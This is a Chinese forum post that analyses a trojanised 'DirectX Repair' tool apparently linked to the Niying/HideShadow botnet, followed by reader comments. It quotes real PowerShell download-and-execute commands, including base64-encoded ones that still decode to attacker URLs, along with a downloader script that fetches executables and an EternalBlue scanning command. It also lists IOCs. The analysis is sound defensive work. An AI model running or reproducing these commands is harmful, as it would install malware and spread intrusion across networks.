疑似匿影僵尸网络最新活动

ahov

一、 背景

近日，在帮助用户解决病毒问题时，发现用户中的是下载者木马。
其中一条日志内容为：

防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行："powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
操作结果：已允许

进程ID：6504
操作进程：C:\Windows\nssm.exe
操作进程命令行：C:\Windows\nssm.exe
操作进程校验和：32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1
父进程ID：1080
父进程：C:\Windows\System32\services.exe
父进程命令行：C:\Windows\system32\services.exe

操作系统目录竟然出现了nssm工具

将操作进程命令行进行base64解密即可得到：IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))

通过查询威胁情报，寻找到一个类似的样本hxxp://win.yearidper.com/per.txt

继续研究安全日志，发现一条日志内容为：

防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell  "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作结果：已阻止

进程ID：18248
操作进程：C:\Windows\SysWOW64\cmd.exe
操作进程命令行：cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作进程校验和：4048488DE6BA4BFEF9EDF103755519F1F762668F
父进程ID：13520
父进程：C:\Windows\SysWOW64\mmc.exe
父进程命令行：mmc.exe

将该URL下载后，发现其为PowerShell下载者木马。

再次查阅安全日志：

病毒名称：Trojan/Agent
病毒ID：A68B6378A5A9FBBE
病毒路径：C:\Users\Public\sharpwmi.exe
操作类型：修改
操作结果：已处理

进程ID：13520
操作进程：C:\Windows\SysWOW64\mmc.exe
操作进程命令行：mmc.exe
父进程：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

发现病毒将部分文件保存至C:\Users\Public下，打开C:\Users\Public，发现多个永恒之蓝漏洞攻击程序和爆破攻击程序（pass.txt为密码字典，user.txt为用户名字典）：


继续翻阅安全日志：

风险路径：C:\Windows\system32\WMIHACKER_0.6.vbs, 病毒名：Backdoor/VBS.WMIHacker.a, 病毒ID：a81b2725827b6a11, 处理结果：已处理，删除文件
风险路径：C:\Windows\SysWOW64\WMIHACKER_0.6.vbs, 病毒名：Backdoor/VBS.WMIHacker.a, 病毒ID：a81b2725827b6a11, 处理结果：已处理，删除文件

可发现病毒往系统目录塞了两个可疑vbs，文件名为WMIHACKER_0.6.vbs经过查询，WMIHACKER为内网横向渗透攻击工具。

询问用户后，用户称下载并运行了一个“dx修复工具”（DirectXRepair_4.1.0.30770_Online.rar）后出现相关症状。

二、追溯
（一）
通过hxxp://ye.yearidper.com，可查询到之前多人在多个论坛中此毒，如下图所示：

（二）
1.
通过对hxxp://cdn.comenbove.com的威胁情报查询，发现了一个通信样本（9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97）：


该样本伪装为Steam相关文件

PE文件信息：

文件说明：Steam
文件版本：2.10.91.91
产品名称：Steam
语言：0x0816 0x04e4
版权：© Valve Corporation

运行后，该样本会直接访问并下载hxxp://cdn.comenbove.com/shell.txt，内容为Powershell下载者木马：

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

该样本同时会执行命令行：

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=
base64解密后为：
IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))

访问并下载hxxp://5d.bbacpummd.cloud，内容为：

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

同时，我们发现，样本还会访问并下载http://5d.strongapt.ml当中的文件，但网站已挂，经过查询发现该域名曾被用于“匿影”僵尸网络投放此前的“WannaRen”勒索病毒（360发现，此前地址为hxxps://api.strongapt.ml/vmp2.jpg），奇安信也早已将多个通信域名标记为“HideShadowMiner”家族处理。



实锤为疑似“匿影”僵尸网络相关病毒样本。

2.
通过对hxxp://cdn.comenbove.com的威胁情报查询，又发现该服务器还有一个hxxp://cdn.comenbove.com/smb.jpg，如下图所示：



内容为：

$fileNames = Test-Path C:\ProgramData\smbx22.txt
$nic='True'
if($fileNames -ne $nic){
(new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:\ProgramData\smbx22.txt')

    }

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

（https://www.upload.ee/files/14046702/1.txt.html为0kb空白空文件）

三、对带毒DirectXRepair进行探究

文件名：DirectX Repair.exe

PE文件信息：

File Version Information:
Original Name：加入任务计划.exe
Internal Name：加入任务计划
File Version：1.0

文件运行后，会一边释放“dx修复工具”所需文件，一边释放nssm.exe至系统目录下：

Files Dropped：

%ProgramData%\DirectX Repair.exe
%windir%\nssm.exe

随后，便会命令行执行：

%windir%\nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA

（与“一、背景”一章当中为同一个Powershell命令，base64解密结果与第一章一致）

经过分析，样本会在%ProgramData%内释放正常使用“dx修复”功能所需的组件，而背后又在一边偷偷释放和执行%windir%\nssm.exe与cmd或Powershell下载者木马命令行，相关思维导图如下图所示：


四、价值意义

“匿影”僵尸网络曾投放“WannaRen”等勒索病毒，甚至有一部分用户中此病毒时同时中了勒索病毒（暂时无法确定其是否有关联），虽然暂未发现其他行为，但是对用户危害较大，其危害性不容小觑，用户发现告警后需及时处理。

五、Iocs

文件名	病毒类型	MD5
EternalBlue.ps1	漏洞攻击程序	17631532e3afc09eb8ccbe172adbd422
MS17010EXP.ps1	漏洞攻击程序	3d485260a28a458ec499a6951640f651
NoPSExec.exe	黑客工具	9a029b987b9a8df9613559dbe67969b5
sharpwmi.exe	黑客工具	8fdf897330a9c01776a4242d26089622
smbexec40.exe	黑客工具	23d02116f7489304bac069051636bcc8
WMIHACKER_0.6.vbs	黑客工具	ceb337687402e19efdf57264b2682d08
shell	Powershell下载者	f409c880cd868f743e30ac4b7db611fe
Ladon66.jpg	Powershell下载者	c8c04f28271812c48497f55e7d3d951f
smb.jpg	Powershell下载者	bbf56807db3e256d38aee5b3386f601a
Ladon.exe	木马病毒	2a871079cd6f8d845de0554a6ba29ddf
Asy.jpg	木马病毒	8a846340033c363af8efdbe4f865d2ad
Steam.exe	木马病毒	c1e7fc36f3a71f6dcb210b4f3127918d
DirectX Repair.exe	木马病毒	e5ec937968841a68872ac135039b3914

hxxp://ye.yearidper.com
hxxp://cdn.comenbove.com/Ladon66.jpg
hxxp://cdn.comenbove.com/shell.txt
hxxp://cdn.comenbove.com/smbdown/cp.txt
hxxp://cdn.comenbove.com/smbdown/abc.jpg
hxxp://cdn.comenbove.com/Asy.jpg
hxxp://cdn.comenbove.com/smb.jpg
hxxp://5d.bbacpummd.cloud/

*本文当中恶意链接均已做无害化处理（hxxp），base64代码可能会被防病毒软件检测到属正常现象网页不可被直接执行为了保证文章尽量完整暂时不做处理。

心伤的天堂

我爱猫哥 发表于 2022-5-31 16:28
能不能提供下  pass.txt和 user.txt  两个字典

  你这角度特殊 哈哈

江月518

前天我外网的虚拟机也被中了僵尸病毒，那个中毒的虚拟机一直攻击我的物理机，我反查下工具者的IP都是来自北京的某家云服务器的攻击。估计他家服务器也全部沦陷了，这个僵尸病毒太可怕了

我爱猫哥

能不能提供下  pass.txt和 user.txt  两个字典

skywalker0123

微步在线云沙箱还挺好用的。如果那个人不是动态IP，还可以用微步查查

月清晖

病毒更倾向于伪装和传播了

lizooo

以后下载软件必须先进沙盒测试了，不然心里不安定呀

我爱猫哥

心伤的天堂 发表于 2022-5-31 17:28
你这角度特殊 哈哈

爱好就是搜集各种字典、密码

wyd521

这个病毒真的是太狡猾了

notifier

我爱猫哥 发表于 2022-5-31 16:28
能不能提供下  pass.txt和 user.txt  两个字典

舍不得孩子套不着狼~ 染个毒就有了

99910369

所以 影子卫士搞起，裸，，，奔